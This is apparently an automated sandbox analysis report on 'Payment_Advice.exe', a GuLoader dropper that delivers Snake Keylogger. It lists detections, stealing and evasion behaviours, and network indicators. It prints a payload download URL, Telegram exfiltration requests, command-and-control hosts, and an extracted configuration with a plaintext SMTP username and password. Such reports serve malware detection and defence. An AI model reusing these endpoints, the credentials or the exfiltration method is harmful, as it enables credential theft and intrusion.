Windows Analysis Report
Payment_Advice.exe

Overview

General Information

Sample name: Payment_Advice.exe
Analysis ID: 1481503
MD5: 0347f8c12b5bb537bdbeca759b4c67f4
SHA1: db7617a367383cde0ae94564f5b2484692554a88
SHA256: e67c6018e32d7e2f598cf535fb6977c012cfa4fba14a21b4884adf405d3faeb0
Tags: exesigned
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Powershell creates an autostart link
Powershell drops PE file
Sample is not signed and drops a device driver
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://aborters.duckdns.org:8081 Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081 Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mario@electromac.com.bo", "Password": "Amor1950narciso", "Host": "mail.electromac.com.bo", "Port": "587"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe ReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: Payment_Advice.exe ReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: Payment_Advice.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.0
Source: unknown HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbu source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: aqm.Core.pdbh source: powershell.exe, 00000002.00000002.2435366329.00000000076DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl] source: powershell.exe, 00000002.00000002.2435366329.0000000007645000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbB396-481F-9042-AD358843EC24c source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 028BF2EDh 5_2_028BF12B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 028BFAA9h 5_2_028BF804
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 028BF2EDh 5_2_028BF33C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 24492C21h 5_2_24492970
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 244931E8h 5_2_24492DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_24490040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449E311h 5_2_2449E068
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449DEB9h 5_2_2449DC10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449E769h 5_2_2449E4C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449F019h 5_2_2449ED70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449EBC1h 5_2_2449E918
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 244931E8h 5_2_24493116
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449F471h 5_2_2449F1C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 244931E8h 5_2_24492DC7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449FD21h 5_2_2449FA78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449F8C9h 5_2_2449F620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449D609h 5_2_2449D360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449D1B1h 5_2_2449CF08
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 24490D0Dh 5_2_24490B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 24491697h 5_2_24490B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 4x nop then jmp 2449DA61h 5_2_2449D7B8

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 193.122.6.168 193.122.6.168
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-includes/QMHHyMk225.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /wp-includes/QMHHyMk225.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: www.reap.skyestates.com.mt
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.electromac.com.bo
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 08:19:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000002.00000002.2435366329.0000000007679000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://electromac.com.bo
Source: wab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.electromac.com.bo
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r10.i.lencr.org/01
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r10.o.lencr.org0#
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wab.exe, 00000005.00000002.3299130843.000000002183E000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002182F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: wab.exe, 00000005.00000002.3299130843.0000000021839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: Payment_Advice.exe, Payment_Advice.exe.2.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216FA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: wab.exe, 00000005.00000002.3299130843.000000002186A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reap.skyestates.com.mt/
Source: wab.exe, 00000005.00000002.3285487324.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin
Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
